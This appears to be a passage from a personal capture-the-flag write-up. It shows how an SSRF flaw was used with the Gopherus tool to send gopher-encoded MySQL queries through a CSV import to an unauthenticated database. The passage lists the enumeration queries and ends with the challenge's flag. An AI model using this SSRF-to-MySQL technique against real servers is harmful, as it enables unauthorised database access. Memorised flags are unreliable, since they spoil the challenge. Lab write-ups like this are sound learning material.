
While logged in as admin, we see a **messages** button, clicking that reveals

So `brian` has a **mysql** database that isn't password protected. Neat.
The server configuration confirms the existance of a **mysql** server

Thinks we know:
1. brian has a mysql server that doesn't require a password
2. the mysql server is at `10.10.10.53:3306`
3. The server is vulnerable to **SSRF**
There's a tool called **gopherus** that is built for attacking things like **mysql** using **SSRF**. It will build a **gohper** link for us to use
https://github.com/tarunkant/Gopherus
`gopherus --exploit mysql`

adding that **gopher link** to our **CSV** and editing the **url** to match what it says in the config file (10.10.10.53), we get back
```
Log:
Resp: shipmentID,arrival_date,catalogURL
Resp: SgAAAAo4LjAuMjUAvigAAF4WFGkVYDhpAP///wIA/88VAAAAAAAAAAAAAAdFXx5xdG0xI2grIwBteXNxbF9uYXRpdmVfcGFzc3dvcmQABwAAAgAAAAIAAAABAAABATYAAAIDZGVmAAhTQ0hFTUFUQQhzY2hlbWF0YQhEYXRhYmFzZQhEYXRhYmFzZQwhAMAAAAD9gRAAAAATAAADEmluZm9ybWF0aW9uX3NjaGVtYQgAAAQHd2Vibm90ZQcAAAX+AAAiAAAA
invalid format!
Cannot import records!
```
More base64

Looks like there's a database called `webnote`. Using **gopherus** to issue these commands, we can enumerate the database
1. `show databases;`
- reveals the database `webnote`
2. `use webnote; show tables;`
- reveals the table `settings`
3. `use webnote; select column_name from information_schema.columns where table_schema = 'webnote' and table_name = 'settings';`
- reveals the columns `apikey` and `note`
4. `use webnote; select note from settings;`
- gives the flag

`flag{bu7_50m37im3s_Y0u_N33d_i11usi0n}`
---
Back to [[_WebSite Publish/CTF/CTF Index|CTF Index]]
Tags: #ctf #web #ssrf #mysql #sql
Related: